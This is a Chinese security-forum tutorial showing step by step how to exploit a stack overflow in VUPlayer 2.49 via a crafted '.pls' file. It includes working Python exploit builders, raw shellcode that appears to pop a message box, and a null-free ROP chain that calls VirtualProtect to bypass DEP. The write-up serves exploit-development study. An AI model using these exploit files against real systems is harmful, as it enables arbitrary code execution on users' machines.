[原创]VUPlayer 2.49 - '.pls' Stack Buffer Overflow (Bypass DEP)-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]VUPlayer 2.49 - '.pls' Stack Buffer Overflow (Bypass DEP)

2017-3-12 11:52 3767

[原创]VUPlayer 2.49 - '.pls' Stack Buffer Overflow (Bypass DEP)

shuozhang

2017-3-12 11:52

3767

漏洞:https://www.exploit-db.com/exploits/40172/
VUPlayer 2.49 - '.pls' Stack Buffer Overflow
环境:VirtualBox Win7企业版 + VUPlayer 2.49 + immunity debugger
软件运行。界面:

构造触发漏洞的文件

```
#!/usr/bin/python
import struct
exploit = "A"*2000
file = open('./exploit.pls','w')
file.write(exploit)
file.close()
```

播放exploit.pls，触发漏洞

定位覆盖eip的地址

```
#!/usr/bin/python
import struct
exploit = "A"*1012 + "a" * 1000
file = open('./exploit.pls','w')
file.write(exploit)
file.close()
```

触发漏洞函数，跟进去

```
00455742  |. E8 59DBFFFF    CALL VUPlayer.004532A0
```

看到了strcpyA，直接将文件的内容复制到了局部变量中，栈溢出。

利用jmp esp跳到栈中去执行shellcode

```
import struct
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
jmp_esp = "\x9f\x53\x10\x10"
exploit = "A"*1012 + jmp_esp + shellcode
file = open('./exploit.pls','w')
file.write(exploit)
file.close()
```

栈地址执行成功........

接下来试试rop的方式，用mona寻找rop链。
目标：

```
Register setup for VirtualProtect() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualProtect()
 EDI = ROP NOP (RETN)
```

```
0x004ffe6e,  # POP ECX # RETN [VUPlayer.exe] 
0x10109270,  # ptr to &VirtualProtect() [IAT BASSWMA.dll]
0x004d7fe0,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [VUPlayer.exe] 
0x10030950,  # XCHG EAX,ESI # RETN [BASS.dll] 
0x00442985,  # POP EBP # RETN [VUPlayer.exe] 
0x1010539f,  # & jmp esp [BASSWMA.dll]
0x100110ff,  # POP EBX # RETN [BASS.dll] 
0x00000201,  # 0x00000201-> ebx
0x1004041c,  # POP EDX # RETN [BASS.dll] 
0x00000040,  # 0x00000040-> edx
0x004caccd,  # POP ECX # RETN [VUPlayer.exe] 
0x10108a2f,  # &Writable location [BASSWMA.dll]
0x004ca628,  # POP EDI # RETN [VUPlayer.exe] 
0x1003a084,  # RETN (ROP NOP) [BASS.dll]
0x10015f82,  # POP EAX # RETN [BASS.dll] 
0x90909090,  # nop
0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
```

拷贝字符串触发的溢出，在exploit中不能有00，需要调整rop链,不能出现00

```
rop_chain = "\x04\xD8\x01\x10"  # POP ESI # RETN
rop_chain += "\x5c\xe2\x60\x10" #"\x70\x92\x10\x10" #ptr to &VirtualProtect()
rop_chain += "\xAE\x2E\x10\x10" # MOV EAX,DWORD PTR DS:[ESI] # POP EBX # POP EDI # POP ESI # POP EBP # RETN 0x18
rop_chain += "\x90" * 16
rop_chain += "\x50\x09\x03\x10" # XCHG EAX,ESI # RETN [BASS.dll]
rop_chain += "\x90" * 24
rop_chain += "\xAD\x59\x01\x10" # POP EBP # RETN 0x08
rop_chain += "\x9F\x53\x10\x10" # & jmp esp [BASSWMA.dll]
rop_chain += "\x82\x5f\x01\x10" # POP EAX ret
rop_chain += "\x90" * 8
rop_chain += "\xff\xfd\xff\xff" # 201
rop_chain += "\xb4\x4d\x01\x10" # NEG EAX # RETN
rop_chain += "\x72\x2f\x03\x10" # XCHG EAX,EBX # RETN 0x00   201->ebx
rop_chain += "\x82\x5f\x01\x10" # POP EAX ret
rop_chain += "\xc0\xff\xff\xff" # 201
rop_chain += "\xb4\x4d\x01\x10" # NEG EAX # RETN
rop_chain += "\x6d\x8a\x03\x10" # XCHG EAX,EDX # RETN
rop_chain += "\x07\x10\x60\x10" # POP ECX # RETN
rop_chain += "\x2f\x8a\x10\x10" # &Writable location [BASSWMA.dll]
rop_chain += "\x18\x62\x01\x10" # POP EDI # RETN
rop_chain += "\x84\xA0\x03\x10" # RETN  [BASS.dll]
rop_chain += "\x82\x5f\x01\x10" # POP EAX # RETN [BASS.dll]      
rop_chain += "\x90"*4      
rop_chain += "\xA5\xD7\x01\x10" # PUSHAD # RETN
```

最后payload

```
#!/usr/bin/python
import struct
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
rop_chain = "\x04\xD8\x01\x10"  # POP ESI # RETN
rop_chain += "\x5c\xe2\x60\x10"  #"\x70\x92\x10\x10" #ptr to &VirtualProtect()
rop_chain += "\xAE\x2E\x10\x10" # MOV EAX,DWORD PTR DS:[ESI] # POP EBX # POP EDI # POP ESI # POP EBP # RETN 0x18
rop_chain += "\x90" * 16
rop_chain += "\x50\x09\x03\x10" # XCHG EAX,ESI # RETN [BASS.dll]
rop_chain += "\x90" * 24
rop_chain += "\xAD\x59\x01\x10" # POP EBP # RETN 0x08
rop_chain += "\x9F\x53\x10\x10" # & jmp esp [BASSWMA.dll]
rop_chain += "\x82\x5f\x01\x10" # POP EAX ret
rop_chain += "\x90" * 8
rop_chain += "\xff\xfd\xff\xff" # 201
rop_chain += "\xb4\x4d\x01\x10" # NEG EAX # RETN
rop_chain += "\x72\x2f\x03\x10" # XCHG EAX,EBX # RETN 0x00   201->ebx
rop_chain += "\x82\x5f\x01\x10" # POP EAX ret
rop_chain += "\xc0\xff\xff\xff" # 201
rop_chain += "\xb4\x4d\x01\x10" # NEG EAX # RETN
rop_chain += "\x6d\x8a\x03\x10" # XCHG EAX,EDX # RETN
rop_chain += "\x07\x10\x60\x10" # POP ECX # RETN
rop_chain += "\x2f\x8a\x10\x10" # &Writable location [BASSWMA.dll]
rop_chain += "\x18\x62\x01\x10" # POP EDI # RETN
rop_chain += "\x84\xA0\x03\x10" # RETN (ROP NOP) [BASS.dll]
rop_chain += "\x82\x5f\x01\x10" # POP EAX # RETN [BASS.dll]      
rop_chain += "\x90"*4      
rop_chain += "\xA5\xD7\x01\x10"
exploit = "A"*1012 + rop_chain + shellcode
file = open('./exploit.pls','w')
file.write(exploit)
file.close()
```